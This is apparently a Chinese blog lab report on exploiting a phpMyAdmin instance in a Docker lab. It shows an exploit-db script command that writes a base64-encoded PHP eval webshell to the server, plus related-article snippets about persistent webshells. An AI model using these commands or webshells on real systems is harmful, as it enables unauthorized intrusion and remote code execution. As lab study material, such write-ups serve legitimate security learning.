PHP反序列化漏洞实验报告

最新推荐文章于 2024-11-20 11:01:59 发布
原创 最新推荐文章于 2024-11-20 11:01:59 发布 · 433 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细记录了一次PHP反序列化漏洞的实验过程,包括环境搭建、利用phpmyadmin的40185.py漏洞写入一句话木马,以及后续的菜刀连接和木马生成步骤,旨在深入理解该安全问题。

PHP反序列化漏洞实验报告

一、打开环境

Docker-compose up -d
Docker ps
在这里插入图片描述

二、访问phpmyadmin(这里我用的是IP为192.168.1.135:8080)

三、使用kali searchsploit模块进行描述

Searchsploit phpmyadmin
在这里插入图片描述
在这里插入图片描述

我们这里需要找的是40185.py

四、利用40185.py写入一句话木马

先查找文件
Find / -name 40185.py
Python3 /usr/share/exploitdb/exploits/php/webapps/40185.py -u root --pwd=”root” http://192.168.1.135:8080/ -c “file_put_contents(‘shell.php’base64_decode(‘PD9waHAgZXZhbCgkX1BPURbY21kXSk7Pz4=’));”

最低0.47元/天 解锁文章
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
php反序列化漏洞
cxrpty的博客
02-28 297
实验环境:Apache、php5.4 实验原理:是由于程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通 实验步骤: 实验一: php代码如下: <?php class Person{ var $n...
ActiveMQ反序列化漏洞(CVE-2015-5254)
chaojixiaojingang
01-22 602
1.漏洞描述 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2.影响版本 Apache ActiveMQ 5.13.0之前5.x版本 3.漏洞环境搭建 靶机:安装daocker环境centos7: 192.168....
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现实验报告
weixin_48400575的博客
01-20 2791
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现实验报告
Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告
weixin_48400575的博客
01-25 3377
演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞. 环境搭建使用vul
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 3188
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化与反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
Weblogic-Weblogic反序列化漏洞复现(CVE-2017-10271
Litbai_zhang
06-27 615
环境配置 1.安装docker 1. curl https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repo 2. yum install https://download.docker.com/linux/fedora/30/x86_64/stable/Packages/containerd.io-1.2.6-3.3.fc30.x86_64.rpm 3. yum
php反序列化漏洞pikachu
最新发布
02-28
PHP反序列化漏洞发生在应用程序接受来自不可信源的输入并尝试将其转换为对象时。如果攻击者能够控制这个输入,则可以创建恶意数据结构,在目标服务器上执行任意代码。 在Pikachu平台上,存在一个典型的反序列化漏洞...
漏洞威胁分析报告(上册)- 不同视角下的漏洞威胁
further_eye的博客
03-09 2280
前言 刚刚过去的2020年以极具戏剧性的开场和魔幻现实主义的中章,给传统行业当头一棒,疫情的延伸早已超出了绝大部分人的预料。传统行业被迫转型;企业被迫选择线上办公;学校被迫开设网课。在经济体系运作如此困难的情况下,互联网行业在整个市场却占据更稳定的位置,互联网行业飞速发展的同时也带来了前所未有的网络安全挑战。 热爱网络安全的年轻人们,经历了停工、停学,却从未停下漏洞研究的脚步,据统计,2020年新增20086条漏洞信息(来源于cnvd),相较于2019年,漏洞环比增长125.1%。 产品...
Web安全PHP反序列化漏洞的 测试(向服务器写入一句话.
网络安全领域___专研者.
05-29 875
程序员在写代码时,没有对用户输入的序列化字符串做一个严格检测,导致恶意的用户可以控制反序列化的一个过程,因此导致XSS漏洞,代码执行,SQT注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。在进行反序列化的时候就有可能触发对象中的一些魔术方法.
PHP反序列化漏洞说明
weixin_45116657的博客
01-27 450
友情链接:PHP反序列化漏洞说明 序列化 PHP程序为了保存和转储对象,提供了序列化的方法,序列化是为了在程序运行的过程中对对象进行转储而产生的。 序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。 PHP序列化的函数为serialize,反序列化的函数为unserialize. 举例说明: <?php class Test{ public $a...
php反序列化漏洞复现过程
aobipi2343的博客
09-03 657
PHP反序列化漏洞复现 测试代码 我们运行以上代码文件,来证明函数被调用: 应为没有创建对象,所以构造函数__construct()不会被调用,但是__wakeup()跟__destruct()函数都被调用,如果这些函数里面包含的是恶意代码会怎么样呢? 利用场景 __wakeup() 或__destruct() 由前可以看到,unserializ...
php反序列化漏洞(非常详细),零基础入门到精通,看这一篇就够了
隔壁王叔的博客
11-20 1387
php反序列化漏洞(非常详细),零基础入门到精通,看这一篇就够了
PHP反序列化漏洞(非常详细),零基础入门到精通,看这一篇就够了
隔壁王叔的博客
11-07 972
PHP反序列化漏洞入门(非常详细),零基础入门到精通,看这一篇就够了
003-漏洞梳理篇之php伪协议
weixin_44508748的博客
08-22 6287
PHP伪协议指的是PHP所支持的协议与封装协议(共12种),在web渗透漏洞利用中常用于配合文件包含进行web攻击,从而获取网站权限。 环境概要: php.ini配置文件参数: allow_url_fopen :on #默认开启 ,表示允许url里的封装协议访问文件; allow_url_include:off #默认关闭,表示不允许包含url里的封装协议包含文件; ...
不死马php如何取证_不死马 - Unixcs - 博客园
weixin_39805720的博客
12-21 417
什么是不死马?内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。生成过程不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)两种不死马网上流传的不死马ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '...
pikachu-php反序列化源码分析及修复
静水流深,沧笙踏歌
09-08 1540
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。             序列化serialize()            ...
不死马
a674212706的博客
08-05 1410
什么是不死马? 内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。 生成过程 不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php) 两种不死马 网上流传的不死马 <?php ignore_user_abort(true); set_time_limit(0); unlink(...
Oracle WebLogic反序列化漏洞官方补丁指南
描述中提到的“weblogic反序列化漏洞官方解决方案”指的是Oracle针对WebLogic Server中的一个特定安全漏洞所发布的官方修复补丁。反序列化漏洞是一种常见的安全风险,它发生在应用程序反序列化数据时,攻击者通过...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值